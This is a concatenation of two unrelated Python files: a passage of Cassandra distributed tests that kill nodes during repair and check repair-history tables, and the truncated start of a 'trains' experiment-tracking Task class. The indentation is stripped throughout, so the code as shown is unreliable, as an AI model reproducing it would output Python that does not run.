node1.nodetool('repair keyspace1 standard1 -inc -par')
@since('2.2')
def test_dead_sync_initiator(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='sync', initiator=True)
@since('2.2')
def test_dead_sync_participant(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='sync', initiator=False,)
@since('2.2', max_version='4')
def test_failure_during_anticompaction(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='anticompaction',)
@since('2.2')
def test_failure_during_validation(self):
"""
@jira_ticket CASSANDRA-12901
"""
self._test_failure_during_repair(phase='validation')
def _test_failure_during_repair(self, phase, initiator=False):
cluster = self.cluster
# We are not interested in specific errors, but
# that the repair session finishes on node failure without hanging
self.fixture_dtest_setup.ignore_log_patterns = [
"Endpoint .* died",
"Streaming error occurred",
"StreamReceiveTask",
"Stream failed",
"Session completed with the following error",
"Repair session .* for range .* failed with error",
"Sync failed between .* and .*",
"failed to send a stream message/file to peer",
"failed to send a stream message/data to peer"
]
# stream session will be closed upon EOF, see CASSANDRA-15666
if cluster.version() >= '4.0':
self.ignore_log_patterns.append("Socket closed before session completion")
self.ignore_log_patterns.append("is finished with state FAILED")
self.ignore_log_patterns.append("stream has been closed")
self.ignore_log_patterns.append("stream operation from .* failed")
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Setting up cluster..")
cluster.populate(3)
node1, node2, node3 = cluster.nodelist()
node_to_kill = node2 if (phase == 'sync' and initiator) else node3
logger.debug("Setting up byteman on {}".format(node_to_kill.name))
# set up byteman
node_to_kill.byteman_port = '8100'
node_to_kill.import_config_files()
logger.debug("Starting cluster..")
cluster.start(jvm_args=['-Djdk.attach.allowAttachSelf=true'])
# cluster.start()
logger.debug("stopping node3")
node3.stop(gently=False, wait_other_notice=True)
self.patient_exclusive_cql_connection(node1)
logger.debug("inserting data while node3 is down")
node1.stress(stress_options=['write', 'n=1k',
'no-warmup', 'cl=ONE',
'-schema', 'replication(factor=3)',
'-rate', 'threads=10'])
logger.debug("bring back node3")
node3.start(wait_for_binary_proto=True)
if phase == 'sync':
script = 'stream_sleep.btm'
else:
script = 'repair_{}_sleep.btm'.format(phase)
if phase == 'validation':
prefix = '4.0' if cluster.version() >= '4.0' else 'pre4.0'
script = prefix + '/' + script
logger.debug("Submitting byteman script to {}".format(node_to_kill.name))
# Sleep on anticompaction/stream so there will be time for node to be killed
node_to_kill.byteman_submit([mk_bman_path(script)])
def node1_repair():
global nodetool_error
try:
node1.nodetool('repair keyspace1 standard1')
except Exception as e:
nodetool_error = e
logger.debug("repair node1")
# Launch in a external thread so it does not hang process
t = Thread(target=node1_repair)
t.start()
logger.debug("Will kill {} in middle of {}".format(node_to_kill.name, phase))
msg_to_wait = 'streaming plan for Repair'
if phase == 'anticompaction':
msg_to_wait = 'Got anticompaction request'
elif phase == 'validation':
msg_to_wait = 'Validating'
node_to_kill.watch_log_for(msg_to_wait, filename='debug.log')
node_to_kill.stop(gently=False, wait_other_notice=True)
logger.debug("Killed {}, now waiting repair to finish".format(node_to_kill.name))
t.join(timeout=60)
assert not t.is_alive(), 'Repair still running after sync {} was killed'\
.format("initiator" if initiator else "participant")
if cluster.version() < '4.0' or phase != 'sync':
# the log entry we're watching for in the sync task came from the
# anti compaction at the end of the repair, which has been removed in 4.0
node1.watch_log_for('Endpoint .* died', timeout=60)
node1.watch_log_for('Repair command .* finished', timeout=60)
RepairTableContents = namedtuple('RepairTableContents',
['parent_repair_history', 'repair_history'])
@since('2.2')
@pytest.mark.resource_intensive
class TestRepairDataSystemTable(Tester):
"""
@jira_ticket CASSANDRA-5839
Tests the `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables by writing thousands of records
to a cluster, then ensuring these tables are in valid states before and
after running repair.
"""
@pytest.fixture(scope='function', autouse=True)
def fixture_set_cluster_settings(self, fixture_dtest_setup):
"""
Prepares a cluster for tests of the repair history tables by starting
a 5-node cluster, then inserting 5000 values with RF=3.
"""
self.cluster = fixture_dtest_setup.cluster
self.cluster.populate(5).start()
self.node1 = self.cluster.nodelist()[0]
self.session = fixture_dtest_setup.patient_cql_connection(self.node1)
self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)'])
fixture_dtest_setup.cluster.flush()
def repair_table_contents(self, node, include_system_keyspaces=True):
"""
@param node the node to connect to and query
@param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system'
Return a `RepairTableContents` `namedtuple` containing the rows in
`node`'s `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables. If `include_system_keyspaces`,
include all results. If not `include_system_keyspaces`, filter out
repair information about system keyspaces, or at least keyspaces with
'system' in their names.
"""
session = self.patient_cql_connection(node)
def execute_with_all(stmt):
return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL))
parent_repair_history = execute_with_all('SELECT * FROM system_distributed.parent_repair_history;')
repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;')
if not include_system_keyspaces:
parent_repair_history = [row for row in parent_repair_history
if 'system' not in row.keyspace_name]
repair_history = [row for row in repair_history if
'system' not in row.keyspace_name]
return RepairTableContents(parent_repair_history=parent_repair_history,
repair_history=repair_history)
@pytest.mark.skip(reason='hangs CI')
def test_initial_empty_repair_tables(self):
logger.debug('repair tables:')
logger.debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False))
repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict()
for table_name, table_contents in list(repair_tables_dict.items()):
assert not table_contents, '{} is non-empty'.format(table_name)
def test_repair_parent_table(self):
"""
Test that `system_distributed.parent_repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `parent_repair_history`.
"""
self.node1.repair()
parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
assert len(parent_repair_history)
def test_repair_table(self):
"""
Test that `system_distributed.repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `repair_history`.
"""
self.node1.repair()
_, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
assert len(repair_history)
|
task.py
|
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, List
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.args import _Arguments
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
class Task(_Task):
"""
Task (experiment) object represents the current running experiments and connects all the different parts into \
a fully reproducible experiment
Common usage is calling :func:`Task.init` to initialize the main task.
The main task is development / remote execution mode-aware, and supports connecting various SDK objects
such as Models etc. In development mode, the main task supports task reuse (see :func:`Task.init` for more
information in development mode features).
Any subsequent call to :func:`Task.init` will return the already-initialized main task
and will not create a new main task.
Sub-tasks, meaning tasks which are not the main task and are not development / remote execution mode aware, can be
created using :func:`Task.create`. These tasks do no support task reuse and any call
to :func:`Task.create` will always create a new task.
You can also query existing tasks in the system by calling :func:`Task.get_task`.
**Usage:** :func:`Task.init` or :func:`Task.get_task`
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Task
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
Do not construct Task manually!
**Please use Task.init() or Task.get_task(id=, project=, name=)**
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._artifacts_manager = Artifacts(self)
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Return the Current Task object for the main execution task (task context).
:return: Task() object or None
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None,
task_name=None,
task_type=TaskTypes.training,
reuse_last_task_id=True,
output_uri=None,
auto_connect_arg_parser=True,
auto_connect_frameworks=True,
auto_resource_monitoring=True,
):
# type: (Optional[str], Optional[str], TaskTypes, bool, Optional[str], bool, Union[bool, Mapping[str, bool]], bool) -> Task
"""
Return the Task object for the main execution task (task context).
:param project_name: project to create the task in (if project doesn't exist, it will be created)
:param task_name: task name to be created (in development mode, not when running remotely)
:param task_type: task type to be created, Default: TaskTypes.training
Options are: 'testing', 'training' or 'train', 'inference'
:param reuse_last_task_id: start with the previously used task id (stored in the data cache folder).
if False every time we call the function we create a new task with the same name
Notice! The reused task will be reset. (when running remotely, the usual behaviour applies)
If reuse_last_task_id is of type string, it will assume this is the task_id to reuse!
Note: A closed or published task will not be reused, and a new task will be created.
:param output_uri: Default location for output models (currently support folder/S3/GS/Azure ).
notice: sub-folders (task_id) is created in the destination folder for all outputs.
Usage example: /mnt/share/folder, s3://bucket/folder , gs://bucket-name/folder,
azure://company.blob.core.windows.net/folder/
Note: When using cloud storage, make sure you install the accompany packages.
For example: trains[s3], trains[gs], trains[azure]
:param auto_connect_arg_parser: Automatically grab the ArgParser and connect it with the task.
if set to false, you can manually connect the ArgParser with task.connect(parser)
:param auto_connect_frameworks: If True automatically patch MatplotLib, XGBoost, scikit-learn,
Keras callbacks, and TensorBoard/X to serialize plots, graphs and model location to trains backend
(in addition to original output destination).
Fine grained control is possible by passing a dictionary instead of a Boolean.
Missing keys are considered to have True value, empty dictionary is considered as False, full example:
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True, 'detect_repository': True}
:param auto_resource_monitoring: If true, machine vitals will be sent along side the task scalars,
Resources graphs will appear under the title ':resource monitor:' in the scalars tab.
:return: Task() object
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
task_type_lookup = {'testing': cls.TaskTypes.testing, 'inference': cls.TaskTypes.testing,
'train': cls.TaskTypes.training, 'training': cls.TaskTypes.training,}
if task_type not in task_type_lookup:
raise ValueError("Task type '{}' not supported, options are: {}".format(task_type,
list(task_type_lookup.keys())))
task_type = task_type_lookup[task_type]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
project_name,
task_name,
task_type,
reuse_last_task_id,
detect_repo=False if (isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(task)
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# parse_args was automatically patched, but auto_connect_arg_parser is False...
raise UsageError("ArgumentParser.parse_args() was automatically connected to this task, "
"although auto_connect_arg_parser is turned off!\n"
"When turning off auto_connect_arg_parser, call Task.init(...) "
"before calling ArgumentParser.parse_args()")
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}/projects/{}/experiments/{}/output/log'.format(
task._get_app_server(),
task.project if task.project is not None else '*',
task.id,
),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(
cls,
project_name=None,
task_name=None,
task_type=TaskTypes.training,
):
# type: (Optional[str], Optional[str], TaskTypes) -> Task
"""
Create a new Task object, regardless of the main execution task (Task.init).
Notice: This function will always create a new task, whether running in development or remote execution mode.
:param project_name: Project to create the task in.
If project is None, and the main execution task is initialized (Task.init), its project will be used.
If project is provided but doesn't exist, it will be created.
:param task_name: task name to be created
:param task_type: Task type to be created. (default: "training")
Optional Task types are: "training" / "testing" / "dataset_import" / "annotation" / "annotation_manual"
:return: Task() object
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Returns Task object based on either, task_id (system uuid) or task name
:param str task_id: unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to
:param str task_name: task name (str) in within the selected project
:return: Task object
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Returns a list of Task objects, matching requested task name (or partially matching)
:param list(str) task_ids: list of unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) in within the selected project
Return any partial match of task_name, regular expressions matching is also supported
If None is passed, returns all tasks within the project
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: list of Task object
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name, task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Read-only dictionary of Task artifacts (name, artifact)
:return dict: dictionary of artifacts
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, List[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}
"""
return self.get_models()
@classmethod
def clone(cls, source_task=None, name=None, comment=None, parent=None, project=None):
# type: (Optional[Task], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> Task
"""
Clone a task object, create a copy a task.
:param source_task: Source Task object (or ID) to be cloned
:type source_task: Task/str
:param str name: Optional, New for the new task
:param str comment: Optional, comment for the new task
:param str parent: Optional parent Task ID of the new task.
If None, parent will be set to source_task.parent, or if not available to source_task itself.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:return: a new cloned Task object
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Task, Optional[str], Optional[str]) -> Any
"""
Enqueue (send) a task for execution, by adding it to an execution queue
:param task: Task object (or Task ID) to be enqueued, None if using Task object
:type task: Task / str
:param str queue_name: Name of the queue in which to enqueue the task.
:param str queue_id: ID of the queue in which to enqueue the task. If not provided use queue_name.
:return: enqueue response
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=queue_name, only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) task from execution queue.
:param task: Task object (or Task ID) to be enqueued, None if using Task object
:type task: Task / str
:return: Dequeue response
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add tags to this task. Old tags are not deleted
When running remotely, this method has no effect.
:param tags: An iterable or space separated string of new tags (string) to add.
:type tags: str or iterable of str
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a task (see introduction to Task connect design)
:param mutable: can be any object Task supports integrating with:
- argparse : for argument passing
- dict : for argument passing
- TaskParameters : for argument passing
- model : for initial model warmup or model update/snapshot uploads
:return: connect_task() return value if supported
:raise: raise exception on unsupported objects
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dict / file (pathlib.Path / str) with the Task
Connecting configuration file should be called before reading the configuration file.
When an output model will be created it will include the content of the configuration dict/file
Example local file:
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
Example parameter dictionary:
my_params = task.connect_configuration(my_params)
:param (dict, pathlib.Path/str) configuration: usually configuration file used in the model training process
configuration can be either dict or path to local file.
If dict is provided, it will be stored in json alike format (hocon) editable in the UI
If pathlib2.Path / string is provided the content of the file will be stored
Notice: local path must be relative path
(and in remote execution, the content of the file will be overwritten with the content brought from the UI)
:return: configuration object
If dict was provided, a dictionary will be returned
If pathlib2.Path / string was provided, a path to a local configuration file is returned
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary with the Task
When an output model is created it will store the model label enumeration dictionary
:param dict enumeration: dictionary of string to integer, enumerating the model output integer to labels
example: {'background': 0 , 'person': 1}
:return: enumeration dict
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a logger object for reporting, for this task context.
All reports (metrics, text etc.) related to this task are accessible in the web UI
:return: Logger object
"""
return self._get_logger()
def mark_started(self):
"""
Manually Mark the task as started (happens automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually Mark the task as stopped (also used in :func:`_at_exit`)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped()
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs
:param wait_for_uploads: if True the flush will exit only after all outstanding uploads are completed
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
if wait_for_uploads:
# noinspection PyProtectedMember
self._logger._flush_wait_stdout_handler()
else:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset the task. Task will be reloaded following a successful reset.
Notice: when running remotely the task will not be reset (as it will clear all logs and metrics)
:param set_started_on_success: automatically set started if reset was successful
:param force: force task reset even if running remotely
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables to manually shutdown the task.
Should only be called if you are absolutely sure there is no need for the Task.
"""
self._at_exit()
self._at_exit_called = False
# unregister atexit callbacks and signal hooks, if we are the main task
if self.is_main_task():
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, "pandas.DataFrame", Dict, Union[bool, Sequence[str]]) -> None
"""
Add artifact for the current Task, used mostly for Data Auditing.
Currently supported artifacts object types: pandas.DataFrame
:param str name: name of the artifacts. Notice! it will override previous artifacts if name already exists.
:param pandas.DataFrame artifact: artifact object, supported artifacts object types: pandas.DataFrame
:param dict metadata: dictionary of key value to store with the artifact (visible in the UI)
:param Sequence uniqueness_columns: Sequence of columns for artifact uniqueness comparison criteria.
The default value is True, which equals to all the columns (same as artifact.columns).
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Remove artifact from the watch list. Notice this will not remove the artifacts from the Task.
It will only stop monitoring the artifact,
the last snapshot of the artifact will be taken immediately in the background.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
dictionary of Task registered artifacts (name, artifact object)
Notice these objects can be modified, changes will be uploaded automatically
:return: dict
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(self, name, artifact_object, metadata=None, delete_after_upload=False):
